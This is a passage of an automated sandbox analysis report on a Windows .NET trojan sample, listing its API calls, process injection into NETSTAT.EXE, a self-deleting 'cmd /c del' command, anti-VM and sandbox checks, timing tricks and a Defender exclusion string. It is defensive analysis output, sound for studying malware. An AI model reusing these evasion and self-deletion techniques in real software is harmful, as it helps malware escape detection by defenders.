            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D895F0 NtQueryInformationFile,18_2_02D895F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89950 NtQueueApcThread,18_2_02D89950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89560 NtWriteFile,18_2_02D89560
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D8AD30 NtSetContextThread,18_2_02D8AD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D89520 NtWaitForSingleObject,18_2_02D89520
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D85B0 NtCreateFile,18_2_003D85B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D8660 NtReadFile,18_2_003D8660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D86E0 NtClose,18_2_003D86E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D8790 NtAllocateVirtualMemory,18_2_003D8790
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D85AA NtCreateFile,18_2_003D85AA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D86DA NtClose,18_2_003D86DA
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D878A NtAllocateVirtualMemory,18_2_003D878A
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000000.00000002.287588690.00000000070D0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000005.00000002.272314311.00000000003AE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000000.272808507.000000000066E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000002.371649875.000000000127F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exeBinary or memory string: OriginalFilenameObjectMarshal.exe6 vs Fu94e0b1TR.exe
            Source: Fu94e0b1TR.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Fu94e0b1TR.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Fu94e0b1TR.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess created: C:\Users\user\Desktop\Fu94e0b1TR.exe C:\Users\user\Desktop\Fu94e0b1TR.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@6/2
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Fu94e0b1TR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Fu94e0b1TR.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: netstat.pdb source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Fu94e0b1TR.exe, NETSTAT.EXE

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Fu94e0b1TR.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Fu94e0b1TR.exe.6d0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Fu94e0b1TR.exe.6d0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.0.Fu94e0b1TR.exe.350000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 5.2.Fu94e0b1TR.exe.350000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 6.2.Fu94e0b1TR.exe.610000.1.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 6.0.Fu94e0b1TR.exe.610000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_00F5203B push ebx; retf 0_2_00F5207A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_07131CAA push 8406FDCBh; retf 0_2_07131CB1
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 0_2_07133B05 push FFFFFF8Bh; iretd 0_2_07133B07
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041B85C push eax; ret 6_2_0041B862
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00407027 push ebx; ret 6_2_00407096
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00415115 push es; iretd 6_2_00415128
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_00414F3A push ds; iretd 6_2_00414F3B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041B7F2 push eax; ret 6_2_0041B7F8
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041B7FB push eax; ret 6_2_0041B862
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0041B7A5 push eax; ret 6_2_0041B7F8
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011DD0D1 push ecx; ret 6_2_011DD0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_02D9D0D1 push ecx; ret 18_2_02D9D0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003C7027 push ebx; ret 18_2_003C7096
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DB85C push eax; ret 18_2_003DB862
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D5115 push es; iretd 18_2_003D5128
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003D4F3A push ds; iretd 18_2_003D4F3B
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DB7A5 push eax; ret 18_2_003DB7F8
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DB7FB push eax; ret 18_2_003DB862
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 18_2_003DB7F2 push eax; ret 18_2_003DB7F8
            Source: initial sampleStatic PE information: section name: .text entropy: 7.77320879492

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.Fu94e0b1TR.exe.2b61628.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fu94e0b1TR.exe PID: 4628, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000003C8604 second address: 00000000003C860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000003C898E second address: 00000000003C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe TID: 4632Thread sleep time: -35139s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exe TID: 6040Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004088C0 rdtsc 6_2_004088C0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeThread delayed: delay time: 35139Jump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.308243918.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000007.00000000.294128069.000000000DC20000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ap88
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.308243918.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.299944517.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000007.00000000.308321174.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000007.00000000.357810922.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000007.00000000.308321174.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_004088C0 rdtsc 6_2_004088C0
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01258D34 mov eax, dword ptr fs:[00000030h]6_2_01258D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0120A537 mov eax, dword ptr fs:[00000030h]6_2_0120A537
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189100 mov eax, dword ptr fs:[00000030h]6_2_01189100
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189100 mov eax, dword ptr fs:[00000030h]6_2_01189100
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01189100 mov eax, dword ptr fs:[00000030h]6_2_01189100
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4D3B mov eax, dword ptr fs:[00000030h]6_2_011B4D3B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4D3B mov eax, dword ptr fs:[00000030h]6_2_011B4D3B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B4D3B mov eax, dword ptr fs:[00000030h]6_2_011B4D3B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B513A mov eax, dword ptr fs:[00000030h]6_2_011B513A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B513A mov eax, dword ptr fs:[00000030h]6_2_011B513A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118AD30 mov eax, dword ptr fs:[00000030h]6_2_0118AD30
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01193D34 mov eax, dword ptr fs:[00000030h]6_2_01193D34
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A4120 mov eax, dword ptr fs:[00000030h]6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A4120 mov eax, dword ptr fs:[00000030h]6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A4120 mov eax, dword ptr fs:[00000030h]6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A4120 mov eax, dword ptr fs:[00000030h]6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A4120 mov ecx, dword ptr fs:[00000030h]6_2_011A4120
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011A7D50 mov eax, dword ptr fs:[00000030h]6_2_011A7D50
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AB944 mov eax, dword ptr fs:[00000030h]6_2_011AB944
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AB944 mov eax, dword ptr fs:[00000030h]6_2_011AB944
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011C3D43 mov eax, dword ptr fs:[00000030h]6_2_011C3D43
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01203540 mov eax, dword ptr fs:[00000030h]6_2_01203540
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118B171 mov eax, dword ptr fs:[00000030h]6_2_0118B171
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118B171 mov eax, dword ptr fs:[00000030h]6_2_0118B171
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AC577 mov eax, dword ptr fs:[00000030h]6_2_011AC577
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AC577 mov eax, dword ptr fs:[00000030h]6_2_011AC577
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_0118C962 mov eax, dword ptr fs:[00000030h]6_2_0118C962
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BFD9B mov eax, dword ptr fs:[00000030h]6_2_011BFD9B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BFD9B mov eax, dword ptr fs:[00000030h]6_2_011BFD9B
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012069A6 mov eax, dword ptr fs:[00000030h]6_2_012069A6
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2990 mov eax, dword ptr fs:[00000030h]6_2_011B2990
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01182D8A mov eax, dword ptr fs:[00000030h]6_2_01182D8A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01182D8A mov eax, dword ptr fs:[00000030h]6_2_01182D8A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01182D8A mov eax, dword ptr fs:[00000030h]6_2_01182D8A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01182D8A mov eax, dword ptr fs:[00000030h]6_2_01182D8A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_01182D8A mov eax, dword ptr fs:[00000030h]6_2_01182D8A
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011AC182 mov eax, dword ptr fs:[00000030h]6_2_011AC182
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2581 mov eax, dword ptr fs:[00000030h]6_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2581 mov eax, dword ptr fs:[00000030h]6_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2581 mov eax, dword ptr fs:[00000030h]6_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011B2581 mov eax, dword ptr fs:[00000030h]6_2_011B2581
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_011BA185 mov eax, dword ptr fs:[00000030h]6_2_011BA185
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012051BE mov eax, dword ptr fs:[00000030h]6_2_012051BE
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012051BE mov eax, dword ptr fs:[00000030h]6_2_012051BE
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012051BE mov eax, dword ptr fs:[00000030h]6_2_012051BE
            Source: C:\Users\user\Desktop\Fu94e0b1TR.exeCode function: 6_2_012051BE mov eax, dword ptr fs:[00000030h]6_2_012051BE
